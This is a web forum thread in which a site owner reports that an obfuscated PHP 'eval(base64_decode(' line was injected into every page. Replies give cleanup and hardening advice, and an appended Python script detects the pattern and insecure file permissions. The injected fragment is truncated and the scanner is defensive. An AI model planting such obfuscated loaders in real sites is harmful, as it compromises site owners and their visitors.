I found a problem on my site, and when I compared the files on the server with my local files I found that every page (*.js or *.php) has this line on it: <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a JavaScript line.
So I knew that my site had been hacked.
So:
1 - I want to know how to prevent anyone from hacking my site.
On every textfield or textarea, when posting or getting it, I applied htmlspecialcharacter($_POST['name']).
If your site is WordPress and you downloaded a theme from a rogue site like worpressthemesbase.com (the first entry on the first Google SERP - still, even after I complained and turned these fiends in to Google...)
If it is WordPress, these rogue themes install a hyperlink in your footer and it's designed to be invisible if you are logged in.
It also makes changes to your wp-includes/general-template.php file.
If this is what happened to you, it's an easy fix.
1.) Upgrade to WordPress 2.8.4
2.) Delete all rogue themes and don't try to fix them.
3.) Replace the file: wp-includes/general-template.php
That's it if this was your problem.
Post more information and/or your solution if you found one or if this was the solution.
What is the code in its entirety... post it in a code box. We can decode it....
While it might be interesting to do so, knowing what the inserted code is does not really help you prevent it from being inserted into your site again, other than, I suppose, using any info in it as something to search on to find out if there's a specific security hole.
As far as preventing:
Only use 3rd-party code that you trust, and make sure you use the latest versions.
Use strong passwords on your web host: login, FTP, and database. If you share them with anyone for some reason, change them as soon as that someone no longer needs them. Since you've been hacked, be sure to change all of them now.
Ensure all directories/files that do not have to have write permission for anyone other than the owner only allow writing by the owner. This is mainly important for shared hosts.
If this is an "important" site to you and you are on a shared host, consider moving to a dedicated host or at least a virtual dedicated host.
Get yourself a copy of Essential PHP Security by Shiflett and read it a couple times (it's short).
"Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be."
~ Terry Pratchett in Nation
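An added example, not code from any poster in this thread: a Python check that walks a site directory, flags files containing the eval(base64_decode( pattern quoted in the question, and lists paths that group or others can write to, which is what the permissions advice above asks you to verify. The function names, the extension list and the sample tree are assumptions made for the example.

```python
import os
import re
import stat
import tempfile

# The injected line quoted in the question: eval() wrapped around base64_decode().
INJECTED = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
SCANNED_EXTENSIONS = (".php", ".js")  # assumption: the file types named in the question

def audit_webroot(root):
    """Return (injected, writable): (path, line) pairs for files containing the
    pattern, and paths under root that group or others may write to."""
    injected, writable = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # a symlink's own mode bits say nothing about its target
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                writable.append(path)
            if stat.S_ISREG(mode) and name.lower().endswith(SCANNED_EXTENSIONS):
                with open(path, "rb") as fh:  # bytes: hacked files may not be valid UTF-8
                    for lineno, line in enumerate(fh, 1):
                        if INJECTED.search(line):
                            injected.append((path, lineno))
                            break
    return sorted(injected), sorted(writable)

def demo():
    """Audit a small constructed site tree (sample data, harmless payload)."""
    root = tempfile.mkdtemp()
    samples = {
        "index.php": b"<?php /**/eval(base64_decode('Q09OU1RSVUNURUQ=')); ?>\n<?php echo 1;\n",
        "clean.php": b"<?php echo base64_decode($data);\n",
        "menu.js": b"var a = 1;\n",
    }
    for name, body in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    os.chmod(os.path.join(root, "menu.js"), 0o666)  # constructed: world-writable
    return (root,) + audit_webroot(root)

if __name__ == "__main__":
    root, injected, writable = demo()
    for path, lineno in injected:
        print("injected code:", path, "line", lineno)
    for path in writable:
        print("writable by group/others:", path)
```

The pattern only covers the PHP form quoted in the question, so an injected JavaScript line needs its own signature, and a legitimate use of eval(base64_decode( would also be reported.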